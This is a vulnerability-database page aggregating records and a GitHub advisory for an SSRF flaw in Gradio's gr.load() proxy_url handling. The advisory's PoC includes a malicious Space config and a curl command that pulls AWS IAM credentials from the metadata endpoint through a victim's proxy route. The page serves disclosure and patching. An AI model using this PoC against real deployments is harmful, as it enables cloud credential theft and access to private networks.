Vulnerability-Lookup

CVE-2026-28416 (GCVE-0-2026-28416)

Vulnerability from cvelistv5 – Published: 2026-02-27 21:47 – Updated: 2026-03-02 21:59

Title

Gradio has SSRF via Malicious `proxy_url` Injection in `gr.load()` Config Processing

Summary

Gradio is an open-source Python package designed for quick prototyping. Prior to version 6.6.0, a Server-Side Request Forgery (SSRF) vulnerability in Gradio allows an attacker to make arbitrary HTTP requests from a victim's server by hosting a malicious Gradio Space. When a victim application uses `gr.load()` to load an attacker-controlled Space, the malicious `proxy_url` from the config is trusted and added to the allowlist, enabling the attacker to access internal services, cloud metadata endpoints, and private networks through the victim's infrastructure. Version 6.6.0 fixes the issue.

Severity ?

8.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

URL

Tags

https://github.com/gradio-app/gradio/security/adv…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	gradio-app	gradio	Affected: < 6.6.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-28416",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-02T21:59:31.348228Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-02T21:59:40.942Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "gradio",
          "vendor": "gradio-app",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 6.6.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Gradio is an open-source Python package designed for quick prototyping. Prior to version 6.6.0, a Server-Side Request Forgery (SSRF) vulnerability in Gradio allows an attacker to make arbitrary HTTP requests from a victim\u0027s server by hosting a malicious Gradio Space. When a victim application uses `gr.load()` to load an attacker-controlled Space, the malicious `proxy_url` from the config is trusted and added to the allowlist, enabling the attacker to access internal services, cloud metadata endpoints, and private networks through the victim\u0027s infrastructure. Version 6.6.0 fixes the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-27T21:47:04.975Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/gradio-app/gradio/security/advisories/GHSA-jmh7-g254-2cq9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-jmh7-g254-2cq9"
        }
      ],
      "source": {
        "advisory": "GHSA-jmh7-g254-2cq9",
        "discovery": "UNKNOWN"
      },
      "title": "Gradio has SSRF via Malicious `proxy_url` Injection in `gr.load()` Config Processing"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-28416",
    "datePublished": "2026-02-27T21:47:04.975Z",
    "dateReserved": "2026-02-27T15:33:57.289Z",
    "dateUpdated": "2026-03-02T21:59:40.942Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-28416",
      "date": "2026-04-17",
      "epss": "0.00017",
      "percentile": "0.04091"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-28416\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-27T22:16:24.667\",\"lastModified\":\"2026-03-05T13:03:21.533\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Gradio is an open-source Python package designed for quick prototyping. Prior to version 6.6.0, a Server-Side Request Forgery (SSRF) vulnerability in Gradio allows an attacker to make arbitrary HTTP requests from a victim\u0027s server by hosting a malicious Gradio Space. When a victim application uses `gr.load()` to load an attacker-controlled Space, the malicious `proxy_url` from the config is trusted and added to the allowlist, enabling the attacker to access internal services, cloud metadata endpoints, and private networks through the victim\u0027s infrastructure. Version 6.6.0 fixes the issue.\"},{\"lang\":\"es\",\"value\":\"Gradio es un paquete Python de c\u00f3digo abierto dise\u00f1ado para la creaci\u00f3n r\u00e1pida de prototipos. Antes de la versi\u00f3n 6.6.0, una vulnerabilidad de falsificaci\u00f3n de petici\u00f3n del lado del servidor (SSRF) en Gradio permite a un atacante realizar peticiones HTTP arbitrarias desde el servidor de una v\u00edctima al alojar un Gradio Space malicioso. Cuando una aplicaci\u00f3n v\u00edctima utiliza \u0027gr.load()\u0027 para cargar un Space controlado por el atacante, se conf\u00eda en la \u0027proxy_url\u0027 maliciosa de la configuraci\u00f3n y se a\u00f1ade a la lista de permitidos, lo que permite al atacante acceder a servicios internos, endpoints de metadatos en la nube y redes privadas a trav\u00e9s de la infraestructura de la v\u00edctima. La versi\u00f3n 6.6.0 corrige el problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N\",\"baseScore\":8.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":4.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\",\"baseScore\":8.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":4.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*\",\"versionEndExcluding\":\"6.6.0\",\"matchCriteriaId\":\"59BB794F-B63D-4D86-B0F0-E60AF9017444\"}]}]}],\"references\":[{\"url\":\"https://github.com/gradio-app/gradio/security/advisories/GHSA-jmh7-g254-2cq9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-28416\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-02T21:59:31.348228Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-02T21:59:37.308Z\"}}], \"cna\": {\"title\": \"Gradio has SSRF via Malicious `proxy_url` Injection in `gr.load()` Config Processing\", \"source\": {\"advisory\": \"GHSA-jmh7-g254-2cq9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"gradio-app\", \"product\": \"gradio\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 6.6.0\"}]}], \"references\": [{\"url\": \"https://github.com/gradio-app/gradio/security/advisories/GHSA-jmh7-g254-2cq9\", \"name\": \"https://github.com/gradio-app/gradio/security/advisories/GHSA-jmh7-g254-2cq9\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Gradio is an open-source Python package designed for quick prototyping. Prior to version 6.6.0, a Server-Side Request Forgery (SSRF) vulnerability in Gradio allows an attacker to make arbitrary HTTP requests from a victim\u0027s server by hosting a malicious Gradio Space. When a victim application uses `gr.load()` to load an attacker-controlled Space, the malicious `proxy_url` from the config is trusted and added to the allowlist, enabling the attacker to access internal services, cloud metadata endpoints, and private networks through the victim\u0027s infrastructure. Version 6.6.0 fixes the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-27T21:47:04.975Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-28416\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-02T21:59:40.942Z\", \"dateReserved\": \"2026-02-27T15:33:57.289Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-27T21:47:04.975Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-28416

Vulnerability from fkie_nvd - Published: 2026-02-27 22:16 - Updated: 2026-03-05 13:03

Severity ?

8.2 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
8.6 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/gradio-app/gradio/security/advisories/GHSA-jmh7-g254-2cq9	Vendor Advisory

Impacted products

	Vendor	Product	Version
	gradio_project	gradio	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*",
              "matchCriteriaId": "59BB794F-B63D-4D86-B0F0-E60AF9017444",
              "versionEndExcluding": "6.6.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Gradio is an open-source Python package designed for quick prototyping. Prior to version 6.6.0, a Server-Side Request Forgery (SSRF) vulnerability in Gradio allows an attacker to make arbitrary HTTP requests from a victim\u0027s server by hosting a malicious Gradio Space. When a victim application uses `gr.load()` to load an attacker-controlled Space, the malicious `proxy_url` from the config is trusted and added to the allowlist, enabling the attacker to access internal services, cloud metadata endpoints, and private networks through the victim\u0027s infrastructure. Version 6.6.0 fixes the issue."
    },
    {
      "lang": "es",
      "value": "Gradio es un paquete Python de c\u00f3digo abierto dise\u00f1ado para la creaci\u00f3n r\u00e1pida de prototipos. Antes de la versi\u00f3n 6.6.0, una vulnerabilidad de falsificaci\u00f3n de petici\u00f3n del lado del servidor (SSRF) en Gradio permite a un atacante realizar peticiones HTTP arbitrarias desde el servidor de una v\u00edctima al alojar un Gradio Space malicioso. Cuando una aplicaci\u00f3n v\u00edctima utiliza \u0027gr.load()\u0027 para cargar un Space controlado por el atacante, se conf\u00eda en la \u0027proxy_url\u0027 maliciosa de la configuraci\u00f3n y se a\u00f1ade a la lista de permitidos, lo que permite al atacante acceder a servicios internos, endpoints de metadatos en la nube y redes privadas a trav\u00e9s de la infraestructura de la v\u00edctima. La versi\u00f3n 6.6.0 corrige el problema."
    }
  ],
  "id": "CVE-2026-28416",
  "lastModified": "2026-03-05T13:03:21.533",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.6,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.0,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-02-27T22:16:24.667",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-jmh7-g254-2cq9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-JMH7-G254-2CQ9

Vulnerability from github – Published: 2026-03-01 01:29 – Updated: 2026-03-01 01:29

Summary

Gradio has SSRF via Malicious `proxy_url` Injection in `gr.load()` Config Processing

Details

Summary

A Server-Side Request Forgery (SSRF) vulnerability in Gradio allows an attacker to make arbitrary HTTP requests from a victim's server by hosting a malicious Gradio Space. When a victim application uses gr.load() to load an attacker-controlled Space, the malicious proxy_url from the config is trusted and added to the allowlist, enabling the attacker to access internal services, cloud metadata endpoints, and private networks through the victim's infrastructure.

Details

The vulnerability exists in Gradio's config processing flow when loading external Spaces:

Config Fetching (gradio/external.py:630): gr.load() calls Blocks.from_config() which fetches and processes the remote Space's configuration.
Proxy URL Trust (gradio/blocks.py:1231-1233): The proxy_url from the untrusted config is added directly to self.proxy_urls: python if config.get("proxy_url"): self.proxy_urls.add(config["proxy_url"])
Built-in Proxy Route (gradio/routes.py:1029-1031): Every Gradio app automatically exposes a /proxy={url_path} endpoint: python @router.get("/proxy={url_path:path}", dependencies=[Depends(login_check)]) async def reverse_proxy(url_path: str):
Host-based Validation (gradio/routes.py:365-368): The validation only checks if the URL's host matches any trusted proxy_url host: python is_safe_url = any( url.host == httpx.URL(root).host for root in self.blocks.proxy_urls )

An attacker can set proxy_url to http://169.254.169.254/ (AWS metadata) or any internal service, and the victim's server will proxy requests to those endpoints.

PoC

Full PoC: https://gist.github.com/logicx24/8d4c1aaa4e70f85d0d0fba06a463f2d6

1. Attacker creates a malicious Gradio Space that returns this config:

{
    "mode": "blocks",
    "components": [...],
    "proxy_url": "http://169.254.169.254/"  # AWS metadata endpoint
}

2. Victim loads the malicious Space:

import gradio as gr
demo = gr.load("attacker/malicious-space")
demo.launch(server_name="0.0.0.0", server_port=7860)

3. Attacker exploits the proxy:

# Fetch AWS credentials through victim's server
curl "http://victim:7860/gradio_api/proxy=http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"

Impact

Who is impacted: - Any Gradio application that uses gr.load() to load external/untrusted Spaces - HuggingFace Spaces that compose or embed other Spaces - Enterprise deployments where Gradio apps have access to internal networks

Attack scenarios: - Cloud credential theft: Access AWS/GCP/Azure metadata endpoints to steal IAM credentials - Internal service access: Reach databases, admin panels, and APIs on private networks - Network reconnaissance: Map internal infrastructure through the victim - Data exfiltration: Access sensitive internal APIs and services

Severity ?

8.2 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "gradio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28416"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-01T01:29:31Z",
    "nvd_published_at": "2026-02-27T22:16:24Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability in Gradio allows an attacker to make arbitrary HTTP requests from a victim\u0027s server by hosting a malicious Gradio Space. When a victim application uses `gr.load()` to load an attacker-controlled Space, the malicious `proxy_url` from the config is trusted and added to the allowlist, enabling the attacker to access internal services, cloud metadata endpoints, and private networks through the victim\u0027s infrastructure.\n\n### Details\n\nThe vulnerability exists in Gradio\u0027s config processing flow when loading external Spaces:\n\n1. **Config Fetching** (`gradio/external.py:630`): `gr.load()` calls `Blocks.from_config()` which fetches and processes the remote Space\u0027s configuration.\n\n2. **Proxy URL Trust** (`gradio/blocks.py:1231-1233`): The `proxy_url` from the untrusted config is added directly to `self.proxy_urls`:\n   ```python\n   if config.get(\"proxy_url\"):\n       self.proxy_urls.add(config[\"proxy_url\"])\n   ```\n\n3. **Built-in Proxy Route** (`gradio/routes.py:1029-1031`): Every Gradio app automatically exposes a `/proxy={url_path}` endpoint:\n   ```python\n   @router.get(\"/proxy={url_path:path}\", dependencies=[Depends(login_check)])\n   async def reverse_proxy(url_path: str):\n   ```\n\n4. **Host-based Validation** (`gradio/routes.py:365-368`): The validation only checks if the URL\u0027s host matches any trusted `proxy_url` host:\n   ```python\n   is_safe_url = any(\n       url.host == httpx.URL(root).host for root in self.blocks.proxy_urls\n   )\n   ```\n\nAn attacker can set `proxy_url` to `http://169.254.169.254/` (AWS metadata) or any internal service, and the victim\u0027s server will proxy requests to those endpoints.\n\n### PoC\n\nFull PoC: https://gist.github.com/logicx24/8d4c1aaa4e70f85d0d0fba06a463f2d6\n\n**1. Attacker creates a malicious Gradio Space** that returns this config:\n```python\n{\n    \"mode\": \"blocks\",\n    \"components\": [...],\n    \"proxy_url\": \"http://169.254.169.254/\"  # AWS metadata endpoint\n}\n```\n\n**2. Victim loads the malicious Space:**\n```python\nimport gradio as gr\ndemo = gr.load(\"attacker/malicious-space\")\ndemo.launch(server_name=\"0.0.0.0\", server_port=7860)\n```\n\n**3. Attacker exploits the proxy:**\n```bash\n# Fetch AWS credentials through victim\u0027s server\ncurl \"http://victim:7860/gradio_api/proxy=http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name\"\n```\n\n### Impact\n\n**Who is impacted:**\n- Any Gradio application that uses `gr.load()` to load external/untrusted Spaces\n- HuggingFace Spaces that compose or embed other Spaces\n- Enterprise deployments where Gradio apps have access to internal networks\n\n**Attack scenarios:**\n- **Cloud credential theft**: Access AWS/GCP/Azure metadata endpoints to steal IAM credentials\n- **Internal service access**: Reach databases, admin panels, and APIs on private networks\n- **Network reconnaissance**: Map internal infrastructure through the victim\n- **Data exfiltration**: Access sensitive internal APIs and services",
  "id": "GHSA-jmh7-g254-2cq9",
  "modified": "2026-03-01T01:29:31Z",
  "published": "2026-03-01T01:29:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-jmh7-g254-2cq9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28416"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gradio-app/gradio/commit/fc7c01ea1e581ef70be98fddf003b0c91315c7cc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gradio-app/gradio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gradio-app/gradio/releases/tag/gradio%406.6.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gradio has SSRF via Malicious `proxy_url` Injection in `gr.load()` Config Processing"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-28416 (GCVE-0-2026-28416)

FKIE_CVE-2026-28416

GHSA-JMH7-G254-2CQ9

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature